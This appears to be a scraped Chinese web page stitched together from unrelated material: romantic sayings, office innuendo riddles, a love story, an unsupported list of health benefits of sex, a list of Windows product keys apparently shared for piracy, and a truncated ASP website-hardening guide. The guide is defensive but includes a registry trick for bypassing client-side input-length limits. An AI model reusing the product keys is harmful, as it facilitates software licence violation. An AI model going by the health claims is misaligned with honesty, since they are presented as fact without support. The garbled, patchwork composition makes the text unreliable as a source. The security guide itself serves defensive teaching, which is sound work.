老公，就是那个让从不懂节约大手大脚的你，变成现在和菜贩子坦然砍价，宁愿多走二站路赶公共汽车的男人。  　　　　老公，就是那个让你每个空余时间都希望有他陪伴，出差后让你掰着指头数归期的男人。  　　　　老公，就是那个让你因为他感冒而心痛得流泪，看到他多吃一碗饭而开心的男人。  　　　　老公，就是那个让在家烧饭你看到天外下了雨，而丢下一切拿起伞去给他送伞的男人。  　　　　女人，记住：老公，就是那个你舍不得给他亏吃的男人,那如果你舍得让他吃亏,让他难过,让他为了你.....................

会错意(一)

下午coffeetime,总经理走近四个女同事旁,“美丽小姐儿们,要不要猜谜啊？

嘻嘻……好啦注意听,猜人身上的东西：上面有毛,下面也有毛,晚上就来个毛对毛。”

“唉呀呀,总经理好色,人家不来了啦！”

“喂喂,别想歪了,答案是‘眼睛’”

会错意(二)

打卡时,总经理对女同事们说：“美丽的小姐们！要不要来个脑筋急转弯？”众脂粉们心想,又来了。

听好喔：“什么东西最硬？女孩子最喜欢,特别是结了婚的女人,更是爱死了。脑筋急转弯！开始！”众脂粉们又开始脸红了,低头都想走开。

“喂喂！还没说出答案啊？”“不来了啦,总经理你最色了啦！”

“喂喂！又想到哪去了？

答案是【钻石】啦！”

会错意(三)

“总经理！今天不玩猜谜啦？”

“这个很难猜,你们一定猜不出来。”

“哼？谁说的？”众小姐们不服输地娇嗔着。

好！那仔细听好。

猜人类的一种东西：“一种玩意儿,可长可短,西方人比较长,东方人比较短。”

众小姐又开始脸红了,开始故作娇羞状。

“唉呀！讨厌啦！再给一些提示嘛？”

“好好,提示：结婚后,妻子就可用丈夫的这个东西。”

“唉呀呀,为什么结婚前就不能用？”一位稍八婆的mm挑逗问道。“如果硬要用,会让人耻笑：成何体统？”

“唉呀！讨厌啦！再给一些提示嘛”众小姐又在故作矜持。

“好好,提示：出家人都不会用它。”

“那…那……尼姑会想到用它吗？”那mm再问。

“尼姑也不用,她们用更长更长的东东。”

“哇！哇？”众小姐发出无比羡慕渴望的娇呼声。

“怎样？猜不出来吧？很难猜,你们就不信。”

“它是不是有时大？有时小？”还是那个mm在问。

“嗯？？没错！当看他比较大,你就说他是：【大】那个;如果看他比较小,你就说他是：【小】那个,像最近打职棒的就用大小来分。”

“唉呀呀！好下流,用【这个】来分？”众小姐低声议论纷纷。

众小姐早已认定答案就是“那个”,只是羞得说不出口。

忽见窗外,董事长座车驶进大门了,众小姐赶紧要回位子了。

“喂喂！们还没猜出来啊？”

“唉呀！不来了啦！总经理好色！”

“喂喂！想到哪去了！答案是姓名的【姓】啊”

会错意(四)

总经理又在玩猜谜的玩意儿。

“各位美丽的小姐儿们,猜个谜语吧？猜人身上的一种东西：

舔也硬,不舔也硬,要舒服睡觉,先搓搓它”

众小姐又开始脸红了……

“唉呀！不来了啦！总经理好色！”

“喂喂！想到哪儿去了！答案是【牙齿】啦。”

会错意(五)

“各位美丽的小姐儿们,猜个谜语吧？仔细听好猜一句成语喔！总不会再想歪了吧：

心里很想要,好想要,好兴奋,又想得要命,结果洞口就慢慢开始流出水来了。”

“唉呀！妈呀！这么不要脸的总经理。”小姐们心里如此骂着！

“怎样？猜不到了吧！嘿嘿嘿！”

“那个…那个是不是会张很开？”38婆故作羞赧地问道。

“没错！而且都一直大大张开着。而且水流得更多。”

“讨厌啦！讨厌啦！不来了啦！总经理好色。”

“喂喂！猜不来就别乱讲,答案是【垂涎三尺】啦。”

会错意(七)

“嗨！美丽的小姐儿们！”

“总经理好！今天还要猜谜吗？”

“不啦！每次都说我好色,不要了啦！”总经理满脸无辜样子。

“好嘛好嘛！我们不说就是了嘛。”

“那么,今儿来猜一种【人的动作】。”

“仔细听好：【下班以后最想做的事,一根硬梆梆的长条东西,直直地插进洞里,快的话,两下就好了。不然就抽出来,再插进去。不达目的绝不终止。猜猜看是什么？“

“唉呀！夭寿啊！还说不色？这次这么粗鲁下流”众小姐都作如是想。

小姐们的脸一个比一个还红,真是假装羞死了。“小孩子可不可以做？”38婆又问了。

“最好不要,出事大人要负责的。”

“白天晚上都可以吗？”还是38婆在问。

嗯！通常都在晚上,白天也可以。不过白天看得较清楚,晚上乌漆妈黑的,好一边摸着,一边再插进去。

“哇！还说不色！”小姐们一边脸红,一边闷声嗤笑。

“还猜不出来？好吧！再给提示：最好不要发生那种让别人胡乱插进去的事,否则要出事的！”

“讨厌！不来了啦！总经理好色。”

“喂喂！猜不来就不要乱栽赃抹黄！答案是：——“钥匙开门”啊！哈！”

多么希望你知道，我是你的打火机，靠着你的身体，感受你的气息。用我小小的身躯，点燃你一刻的快意。用那闪闪的火苗，燎亮你心中的孤寂。是我的暖暖气息，改变了，改变了你的呼吸。 某天 

女孩终于鼓起勇气对男孩说：「我们分手吧」 

男孩问：「为什么？」 

女孩说：「倦了，就不需要理由了」 

一个晚上 

男孩只抽烟不说话 

女孩的心也越来越凉 

『连挽留都不会表达的情人，能给我什么样的快乐？』 

过了许久 

男孩终忍不住说：［怎么做你才能留下来？］ 

女孩慢慢地说：「回答一个问题，如果你能答到我心里就答案，我就留下来。」 

「比如我非常喜欢悬崖上的一朵花，而你去摘的结果是百分之百的死亡，你会不会摘给我？」 

男孩想了想说：「明天早晨告诉你答案好吗？」 

女孩的心顿时…………………… 

早晨醒来，男孩已经不在 

只有一张写满字的纸压在温热的牛奶杯下 

第一行，就让女孩的心凉透了 

「亲爱的，我不会去摘但请容许我陈述不去摘的理由 

你只会用电脑打字，却总把程序弄得一塌糊涂 

然后对着键盘哭，我要留着手指给你整理程序； 

你出门总是忘记带钥匙，我要留着双脚跑回来给你开门 ； 

酷爱旅游的你，在自己的城市里都常常迷路，我要留着眼睛给你带路； 

每月（好朋友）光临时，你总是全身冰凉，还肚子疼，我要留着掌心温暖你的小腹； 

你不爱出门，我担心你会患上自闭症，我要留着嘴巴躯赶你的寂寞； 

你总是盯者电脑，眼睛给糟蹋得已不是太好了，我要好好活着，等你老了，给你修剪指甲，帮你拔掉让你懊恼的白发，拉着你的手，在海边享受美好的阳光和柔软的沙滩，告诉你一朵朵花的颜色，像你青春的脸… 

所以 

在我不能确定有人比我更爱你以前，我不想去摘那朵花…」 

（女孩泪滴在纸上，形成晶莹的花朵） 

抹净眼泪，女孩继续往下看： 

「亲爱的 

如果你已经看完了 

答案还让你满意的话 

请你开门吧！我正站在门外，手里提着你最喜欢吃的鲜奶面包…」 

女孩拉开门 

看见他的脸，紧张得像个孩子 

只会把拧着面包的手在她眼前晃．．．．．． 

我想这就是爱情或者生活 

被幸福平静的包围时 

一些平凡的爱意 

总被渴望激情和浪漫的心忽略 

爱！在双方引起的许多个微不足道的动作里， 

从来就没有固定的模式 

只有爱 

可以是任何一中平淡无奇的形式 

花朵、浪漫 

不过是浮在生活表面的浅浅点缀 

在它们的下面才是我们真真的生活 

一﹑性爱可摧毁压力，舒缓紧张：

  在进行性爱的过程之中，人体荷尔蒙的释放使我们无法感到压力。这个反应甚至可以维持数小时之久，直至荷尔蒙的水平回复整个身体系统的正常水平之中。

  二﹑性爱可以帮助你入睡：

  性爱时身体上的努力和情绪上的高涨会是完美的引擎，引你驶入梦乡。肌肉在兴奋时紧张，并在事后回复松弛，这个过程很明显地有助于休息和睡眠。

  三﹑性爱可以保持青春：

  英国药物研究中心的医生兼辅导专家约翰说：假如你不使用你的性器官，那么它会倾向于退化。

  性生活可提高****的润滑程度，并且滋润****。

  四﹑性可以提高自信心：

  你有定期的性生活表现出你和你的伴侣已爱着对方。性爱时易于达到高潮会觉得自己更有吸引力，提高你的自信心。

  五﹑性爱能够改变你的外观：

  性爱时的刺激和运动会导致肾上腺素产生。这些荷尔蒙能够提高皮肤的透明度，使它看起来明亮透彻一些，人亦漂亮一些。

  六﹑性爱使你和你的伴侣更亲密，包括情绪上和肉体上：

  当你和你的伴侣的关系倾向好的发展时，你俩的性生活也会倾向更好。你们可以通过性来向对方作好的沟通，从而更显恩爱。

  七﹑性爱可舒缓经痛：

  ****时所释放的荷尔蒙能松弛引起经痛的拉力。

  八﹑性爱可以帮助延寿：

  有证据显示婚姻美满的较单身和离婚的更长寿，当中与美满婚姻与性生活有莫大的关系。不论生理上和心理上，作爱有益健康。

  九﹑性爱对心和血液循环系统有裨益：

  性爱可提高你的心跳率和血压。假如你有激烈的运动，可对心血管系统达到良好的运动量。史密夫博士表示，偶尔加速你的心跳率不会有任何害处,这是舒展你的心血管系统的另一种方法，因此有“1周****3次心脏病不上门”之说。

  十﹑性爱燃烧卡路里，有助保持苗条：

  据调查显示，一个热烈的接吻燃烧十二卡路里，而十分钟的爱抚亦可燃烧五十卡路里。既使最迟缓的****，亦可每小时燃烧二百卡路里，相应，假如在这过程中你非常之热烈和兴奋的话，燃烧五六百卡路里是可想而知的。

  只有一个坏处就是会生孩子 ----------哈哈。。 

windows操作系统序列号大全 PWIN95 S/N: 425-0022172 EWIN95 S/N: 111-1111111 CWIN97 S/N: 26495-OEM-0004782-75026 EWIN97 S/N: 00100-OEM-0123456-00100 PWIN97 S/N: 00100-OEM-0123456-00100 CWIN98 S/N: DC688-DET96-5SCN7-E5RLK-XL413 EWIN98 S/N: K4HVD-Q9TJ9-6CRX9-C9G68-RQ2D3 PWIN98 S/N: VR9TR-74M8W-YPT9C-4VDF4-R7PD8 PWIN98 OEM(第二版) S/N: BBH2G-D2VK9-QD4M9-F63XB-43C33 PWIN98 2A 2222版   S/N: QY7TT-VJ7VG-7QPHY-QXHD3-B838Q                         MB9HY-M4JGJ-B3RV2-FPH8D-FP8KY                         WHWGP-XDR8Y-GR9X3-863RP-67J2T Windows98(第三版)th OEM 升级程序密码:1 Windows98(第三版)th OEM 密码:QY7TT-VJ7VG-7QPHY-QXHD3-B838Q WINDOWS ME 简体中文正式零售版        S/N: HJPFQ-KXW9C-D7BRJ-JCGB7-Q2DRJ WINDOWS ME 正式英文零售版        S/N: RBDC9-VTRC8-D7972-J97JY-PRVMG PwindowsXP:简体中文正式零售版        S/N:FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8 Windows XP 专业版 : CCC64-69Q48-Y3KWW-8V9GV-TVKRM Windows XP 家庭版 : BQJG2-2MJT7-H7F6K-XW98B-4HQRQ Windows 2000 Professional   :     PQHKR-G4JFW-VTY3P-G4WQ2-88CTW Windows 2000 Server         :     H6TWQ-TQQM8-HXJYG-D69F7-R84VM Windows 2000 Advanced Server:     RBDC9-VTRC8-D7972-J97JY-PRVMG windows NT Server 4.0 sn: 727-1111111 windows NT WorkStation 4.0 sn: 727-1111111 Windows 98 Second Edition sn: QY7TT-VJ7VG-7QPHY-QXHD3-B838Q Windows2003的序列号： JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY windows2003序列号： cky24-q8qrh-x3kmr-c6bcy-t847y win2003有三种版本： win2003 Enterprise Server:     QW32K-48T2T-3D2PJ-DXBWY-C6WRJ win2003 Standard Server:       M6RJ9-TBJH3-9DDXM-4VX9Q-K8M8M win2003 Web Server:            D42X8-7MWXD-M4B76-MKYP7-CW9FD

如何更好的达到防范黑客攻击，本人提一下个人意见！第一，免费程序不要真的就免费用，既然你可以共享原码，那么攻击者一样可以分析代码。如果在细节上注意 防范，那样你站点的安全性就大大的提高了。即使出现了SQL Injection这样的漏洞，攻击者也不可能马上拿下你的站点。 　　由于ASP的方便易用，越来越多的网站后台程序都使用ASP脚本语言。但是， 由于ASP本身存在一些安全漏洞，稍不小心就会给黑客提供可乘之机。事实上，安全不仅是网管的事，编程人员也必须在某些安全细节上注意，养成良好的安全习 惯，否则会给自己的网站带来巨大的安全隐患。目前，大多数网站上的ASP程序有这样那样的安全漏洞，但如果编写程序的时候注意一点的话，还是可以避免的。 　　1、用户名与口令被破解 　　攻击原理：用户名与口令，往往是黑客们最感兴趣的东西，如果被通过某种方式看到源代码，后果是严重的。 　　防范技巧：涉及用户名与口令的程序最好封装在服务器端，尽量少在ASP文件里出现，涉及与数据库连接的用户名与口令应给予最小的权限。出现次数多的用户 名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及与数据库连接，在理想状态下只给它以执行存储过程的权限，千万不要直接给予该用户修改、插入、删 除记录的权限。 　　2、验证被绕过 　　攻击原理：现在需要经过验证的ASP程序大多是在页面头部加一个判断语句，但这还不够，有可能被黑客绕过验证直接进入。 　　防范技巧：需要经过验证的ASP页面，可跟踪上一个页面的文件名，只有从上一页面转进来的会话才能读取这个页面。 　　3、inc文件泄露问题 　　攻击原理：当存在ASP的主页正在制作且没有进行最后调试完成以前，可以被某些搜索引擎机动追加为搜索对象。如果这时候有人利用搜索引擎对这些网页[www.123z.cn]进行查找，会得到有关文件的定位，并能在浏览器中查看到数据库地点和结构的细节，并以此揭示完整的源代码。 　　防范技巧：程序员应该在网页[www.123z.cn]发布前对它进行彻底的调试；安全专家则需要加固ASP文件以便外部的用户不能看到它们。首先对.inc文件内容进行加密，其 次也可以使用.asp文件代替.inc文件使用户无法从浏览器直接观看文件的源代码。inc文件的文件名不要使用系统默认的或者有特殊含义容易被用户猜测 到的名称，尽量使用无规则的英文字母。 　　4、自动备份被下载 　　攻击原理：在有些编辑ASP程序的工具中，当创建或者 修改一个ASP文件时，编辑器自动创建一个备份文件，比如：UltraEdit就会备份一个.bak文件，如你创建或者修改了some.asp，编辑器会 自动生成一个叫some.asp.bak文件，如果你没有删除这个bak文件，攻击者可以直接下载some.asp.bak文件，这样some.asp的 源程序就会被下载。 　　防范技巧：上传程序之前要仔细检查，删除不必要的文档。对以BAK为后缀的文件要特别小心。 　　5、特殊字符 　　攻击原理：输入框是黑客利用的一个目标，他们可以通过输入脚本语言等对用户客户端造成损坏；如果该输入框涉及数据查询，他们会利用特殊查询语句，得到更 多的数据库数据，甚至表的全部。因此必须对输入框进行过滤。但如果为了提高效率仅在客户端进行输入合法性检查，仍有可能被绕过。 　　防范 技巧：在处理类似留言板、BBS等输入框的ASP程序中，最好屏蔽掉HTML、JavaScript、VBScript语句，如无特殊要求，可以限定只允 许输入字母与数字，屏蔽掉特殊字符。同时对输入字符的长度进行限制。而且不但要在客户端进行输入合法性检查，同时要在服务器端程序中进行类似检查。 　　6、数据库下载漏洞 　　攻击原理：在用Access做后台数据库时，如果有人通过各种方法知道或者猜到了服务器的Access数据库的路径和数据库名称，那么他也能够下载这个Access数据库文件，这是非常危险的。 　　防范技巧： 　　(1)为你的数据库文件名称起个复杂的非常规的名字，并把它放在几层目录下。所谓 "非常规"， 打个比方说，比如有个数据库要保存的是有关书籍的信息， 可不要给它起个"book.mdb"的名字，而要起个怪怪的名称，比如d34ksfslf.mdb， 并把它放在如./kdslf/i44/studi/的几层目录下，这样黑客要想通过猜的方式得到你的Access数据库文件就难上加难了。 　　(2)不要把数据库名写在程序中。有些人喜欢把DSN写在程序中，比如： 　　DBPath = Server.MapPath("cmddb.mdb") 　　conn.Open "driver={Microsoft Access Driver (*.mdb)}；dbq=" & DBPath  　　 　　假如万一给人拿到了源程序，你的Access数据库的名字就一览无余了。因此建议你在ODBC里设置数据源，再在程序中这样写：　  　　conn.open"shujiyuan" 　 　　(3)使用Access来为数据库文件编码及加密。首先在"工具→安全→加密/解密数据库"中选取数据库(如：employer.mdb)，然后按确定，接着会出现"数据库加密后另存为"的窗口，可存为："employer1.mdb"。 　　要注意的是，以上的动作并不是对数据库设置密码，而只是对数据库文件加以编码，目的是为了防止他人使用别的工具来查看数据库文件的内容。 　　接下来我们为数据库加密，首先打开经过编码了的 employer1.mdb，在打开时，选择"独占"方式。然后选取功能表的"工具→安全→设置数据库密码"，接着输入密码即可。这样即使他人得到了 employer1.mdb文件，没有密码他也是无法看到 employer1.mdb中的内容。 　　7、防范远程注入攻击 　　这类攻击在以前应该是比较常见的攻击方式,比如POST攻击,攻击者可以随便的改变要提交的数据值已达到攻击目的.又如:COOKIES 的伪造,这一点更值得引起程序编写者或站长的注意，不要使用COOKIES来做为用户验证的方式,否则你和把钥匙留给贼是同一个道理. 　　比如: 　　If trim(Request. cookies ("uname"))="fqy" and Request.cookies("upwd") ="fqy#e3i5.com" then  ……..more………  End if  　　我想各位站长或者是喜好写程序的朋友千万别出这类错误,真的是不可饶恕.伪造COOKIES 都多少年了，你还用这样的就不能怪别人跑你的密码.涉及到用户密码或者是用户登陆时,你最好使用session 它才是最安全的.如果要使用COOKIES就在你的COOKIES上多加一个信息,SessionID,它的随机值是64位的,要猜解它,不可能.例: 　　if not (rs.BOF or rs.eof) then  login="true"  Session("username"&sessionID) = Username  Session("password"& sessionID) = Password  'Response.cookies("username")= Username  'Response.cookies("Password")= Password  　　 下面我们来谈谈如何防范远程注入攻击,一般的攻击都是将单表提交文件拖到本地,将Form ACTION="chk.asp" 指向你服务器中处理数据的文件即可.如果你全部的数据过滤都在单表页上，那么恭喜你，你将已经被脚本攻击了. 　　怎么才能制止这样的远程攻击?好办,请看代码如下: 程序体(9) 　　 <%  server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))  server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))  if mid(server_v1,8,len(server_v2))<>server_v2 then  response.write "<br><br><center>"  response.write " "  response.write "你提交的路径有误，禁止从站点外部提交数据请不要乱改参数！"  response.write ""  response.end  end if  %>  　　'个人感觉上面的代码过滤不是很好，有一些外部提交竟然还能堂堂正正的进来,于是再写一个. 　　'这个是过滤效果很好,建议使用. 　　 if instr(request.servervariables("http_referer"),"http://"&request.servervariables("host") )<1 then response.write "处理 URL 时服务器上出错。 　　如果您是在用任何手段攻击服务器，那你应该庆幸，你的所有操作已经被服务器记录，我们会第一时间通知公安局与国家安全部门来调查你的IP. " 　　 response.end  end if  　　 程序体(9) 　　本以为这样就万事大吉了，在表格页上加一些限制,比如maxlength啦,等等..但天公就是那么不作美,你越怕什么他越来什么.你别忘了,攻击者可 以突破sql注入攻击时输入框长度的限制.写一个SOCKET程序改变HTTP_REFERER？我不会。网上发表了这样一篇文章： 　　------------len.reg-----------------  Windows Registry Editor Version 5.00  [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\扩展(&E)]  @="C:\Documents and Settings\Administrator\桌面\len.htm"  "contexts"=dword:00000004  -----------end----------------------  -----------len.htm------------------  　　----------end-----------------------  　　 　　用法:先把len.reg导入注册表(注意文件路径) 　　然后把len.htm拷到注册表中指定的地方. 　　打开网页[www.123z.cn],光标放在要改变长度的输入框上点右键,看多了一个叫扩展的选项了吧 　　单击搞定! 后记:同样的也就可以对付那些限制输入内容的脚本了. 　　怎么办？我们的限制被饶过了，所有的努力都白费了？不，举起你de键盘，说不。让我们继续回到脚本字符的过滤吧，他们所进行的注入无非就是进行脚本攻 击。我们把所有的精力全都用到ACTION以后的页面吧，在chk.asp页中，我们将非法的字符全部过滤掉，结果如何？我们只在前面虚晃一枪，叫他们去 改注册表吧，当他们改完才会发现，他们所做的都是那么的徒劳。 　　8、ASP木马 　　已经讲到这里了，再提醒各位论 坛站长一句，小心你们的文件上传：为什么论坛程序被攻破后主机也随之被攻击者占据。原因就在……对！ASP木马！一个绝对可恶的东西。病毒么？非也.把个 文件随便放到你论坛的程序中，您老找去吧。不吐血才怪哦。如何才能防止ASP木马被上传到服务器呢？方法很简单，如果你的论坛支持文件上传，请设定好你要 上传的文件格式，我不赞成使用可更改的文件格式，直接从程序上锁定，只有图象文件格式，和压缩文件就完全可以，多给自己留点方便也就多给攻击者留点方便。 怎么判断格式，我这里收集了一个，也改出了一个，大家可以看一下： 　　程序体(10) 　　’判断文件类型是否合格  Private Function CheckFileExt (fileEXT)  dim Forumupload  Forumupload="gif,jpg,bmp,jpeg"  Forumupload=split(Forumupload,",")  for i=0 to ubound(Forumupload)  if lcase(fileEXT)=lcase(trim(Forumupload(i))) then  CheckFileExt=true  exit Function  else  CheckFileExt=false  end if